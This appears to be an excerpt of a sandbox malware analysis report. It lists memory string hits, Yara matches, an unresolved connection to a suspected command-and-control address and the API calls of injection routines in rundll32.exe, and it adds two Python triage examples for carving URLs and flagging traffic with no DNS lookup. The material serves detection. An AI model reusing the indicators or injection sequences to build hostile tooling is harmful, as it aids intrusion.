Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.osofts/Microt0 |
Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://curlmyip.net |
Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c: |
Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://help.disneyplus.com. |
Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/ip |
Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ns.adobe.cmg |
Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ns.adobe.ux |
Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ns.adobp/ |
Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ns.micro/1 |
Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://twitter.com/spotify |
Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://disneyplus.com/legal. |
Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://support.hotspotshield.com/ |
Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy |
Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights |
Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotspotshield.com/terms/ |
Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://www.pango.co/privacy |
Source: RuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://www.tiktok.com/legal/report/feedback |
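The string hits above mix artefacts of the payload with noise from legitimate components that happened to share the dumped processes (Pester and NuGet module text in powershell.exe, Disney+, Spotify, Hotspot Shield and TikTok URLs in RuntimeBroker.exe). Two kinds of hit deserve attention on their own: contacts to public egress-IP lookup services (curlmyip.net, ipinfo.io/ip), and a string that contains a printf conversion specifier (http://https://file://USER.ID%lu.exe/upd), which can only be a template compiled into code, never a URL that was actually fetched. The following is an added triage example written for this page, not part of the sandbox output: it carves URL-shaped strings from a constructed stand-in for a memory region and buckets them. The list of lookup hosts and the bucketing rules are this example's assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed stand-in for a carved process-memory region (what the report
# calls an .sdmp). The surrounding bytes are invented for this example; the
# URL strings are ones the report lists as found in memory.
SAMPLE_DUMP = (
    b"MZ\x90\x00\x03\x00\x00\x00\xff\xff"
    b"http://curlmyip.net\x00"
    b"http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:\x00"   # string ran into its neighbour
    b"\x00\x00http://ipinfo.io/ip\x00"
    b"http://https://file://USER.ID%lu.exe/upd\x00"        # printf-style template
    b"https://github.com/Pester/Pester\x00"                 # benign module noise
    b"http://constitution.org/usdeclar.txtC:\x00"
    b"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\x00"
)

# Public "what is my egress IP" services (assumed list). A sample that talks
# to one of these is usually fingerprinting the victim before it beacons.
IP_LOOKUP_HOSTS = ("curlmyip.net", "ipinfo.io", "api.ipify.org", "icanhazip.com")

# Any printable run that starts with a scheme; stops at the first
# non-printable byte, exactly like a strings-style carve.
URL_RE = re.compile(rb"(?:https?|file)://[\x21-\x7e]+")
# printf-style conversion specifier such as %lu, %s or %08x
FORMAT_SPEC_RE = re.compile(r"%[-+ 0#]*\d*(?:\.\d+)?(?:hh|h|ll|l|z|j|t|L)?[diouxXeEfgGcsp]")


def carve_urls(dump: bytes) -> list[str]:
    """Return every URL-looking printable run in the dump, in order, deduplicated."""
    seen: list[str] = []
    for m in URL_RE.finditer(dump):
        s = m.group().decode("ascii")
        if s not in seen:
            seen.append(s)
    return seen


def classify(url: str) -> str:
    """Bucket a carved URL the way an analyst triages the report's string list."""
    if FORMAT_SPEC_RE.search(url):
        # A conversion specifier cannot occur in a URL that was ever requested:
        # this is a format string compiled into code and a good Yara candidate.
        return "template"
    host = urlparse(url).netloc.lower()
    # Prefix match on purpose: carved strings often run into the next
    # allocation (the report shows curlmyip.net both clean and with trailing junk).
    if any(host.startswith(h) for h in IP_LOOKUP_HOSTS):
        return "ip_lookup"
    return "other"


def triage(dump: bytes) -> dict[str, list[str]]:
    """Carve and bucket every URL in the dump."""
    buckets: dict[str, list[str]] = {"template": [], "ip_lookup": [], "other": []}
    for url in carve_urls(dump):
        buckets[classify(url)].append(url)
    return buckets


if __name__ == "__main__":
    for bucket, urls in triage(SAMPLE_DUMP).items():
        print(f"[{bucket}]")
        for u in urls:
            print("   ", u)
```

The "other" bucket is where the legitimate-module noise lands; the two other buckets are what is worth carrying into a Yara rule or a network watchlist. The run-on string with the file:// tail is a carving artefact, not a second indicator, which is why the host check tolerates trailing bytes instead of requiring an exact match.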
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 (50 connections logged to this address; identical entries collapsed) |
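The indicator above is a correlation, not a packet signature: the sandbox saw a TCP connect to 185.189.151.28 but no DNS answer that ever returned that address, which is how a hard-coded C2 address shows up. "Source: unknown" means the socket could not be attributed to a process, so before blaming rundll32.exe or control.exe an analyst would line the connect times up against the process timeline. The following is an added example written for this page, not sandbox code: it runs that correlation over a constructed log, excludes LAN destinations, and collapses repeated connects into one finding with a count, which is what the fifty identical rows above amount to. The log format, the internal-range list and the sample entries are this example's assumptions; only 185.189.151.28 is taken from the report.

```python
import ipaddress
import re

# Constructed sample traffic log in a minimal "<ts> <kind> ..." text form. The
# DNS answers and the resolved destinations (203.0.113.x, RFC 5737 documentation
# space) are made up; 185.189.151.28 is the address this report flags.
SAMPLE_LOG = """\
10.000 DNS  example-cdn.test A 203.0.113.10
10.050 TCP  10.0.0.5:49211 -> 203.0.113.10:443
10.400 TCP  10.0.0.5:49212 -> 185.189.151.28:443
10.410 TCP  10.0.0.5:49213 -> 185.189.151.28:443
11.000 DNS  pester.test A 203.0.113.20
11.020 TCP  10.0.0.5:49214 -> 203.0.113.20:80
12.000 TCP  10.0.0.5:49215 -> 185.189.151.28:443
12.500 TCP  10.0.0.5:49216 -> 10.0.0.1:445
"""

DNS_RE = re.compile(r"^(?P<ts>\d+\.\d+) DNS\s+(?P<name>\S+) (?P<rtype>A|AAAA) (?P<ip>\S+)$")
# IPv4 "src:port -> dst:port" form only; IPv6 would need bracketed addresses.
TCP_RE = re.compile(r"^(?P<ts>\d+\.\d+) TCP\s+(?P<src>\S+) -> (?P<dst>[^:\s]+):(?P<port>\d+)$")

# Destinations that are never C2 candidates for this check: LAN, loopback,
# link-local. Kept explicit instead of ipaddress.is_global so that the RFC 5737
# documentation addresses used in the sample count as "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse(log: str):
    """Split the log into DNS answers (ts, name, ip) and TCP connects (ts, dst, port)."""
    dns, tcp = [], []
    for line in log.splitlines():
        if m := DNS_RE.match(line):
            dns.append((float(m["ts"]), m["name"], m["ip"]))
        elif m := TCP_RE.match(line):
            tcp.append((float(m["ts"]), m["dst"], int(m["port"])))
    return dns, tcp


def unresolved_connections(log: str) -> dict[str, dict]:
    """Return external TCP destinations that no earlier DNS answer resolved to.

    Repeated connects to the same address are collapsed into one finding with
    a count, first-seen time and the set of destination ports.
    """
    dns, tcp = parse(log)
    findings: dict[str, dict] = {}
    for ts, dst, port in tcp:
        if is_internal(dst):
            continue
        # Only answers seen *before* the connect count; a lookup that happens
        # afterwards does not explain how the process knew the address.
        if any(dns_ts <= ts and dns_ip == dst for dns_ts, _, dns_ip in dns):
            continue
        f = findings.setdefault(dst, {"count": 0, "first_ts": ts, "ports": set()})
        f["count"] += 1
        f["ports"].add(port)
    return findings


if __name__ == "__main__":
    for ip, f in unresolved_connections(SAMPLE_LOG).items():
        ports = ",".join(str(p) for p in sorted(f["ports"]))
        print(f"{ip}: {f['count']} connect(s) without prior DNS, "
              f"first at t={f['first_ts']}, ports {ports}")
```

Legitimate software also connects to literal addresses now and then (peer-to-peer clients, some update and telemetry agents), so the count and the port set matter: dozens of connects to a single address on one port from a process that has no business talking to the Internet is the pattern to act on, a single hit is a lead.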
Source: Yara match |
File source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D190C GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D6D0A NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D84C1 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628BE80 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06280782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062774AE NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06286DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06282331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06285312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627710A GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06287950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
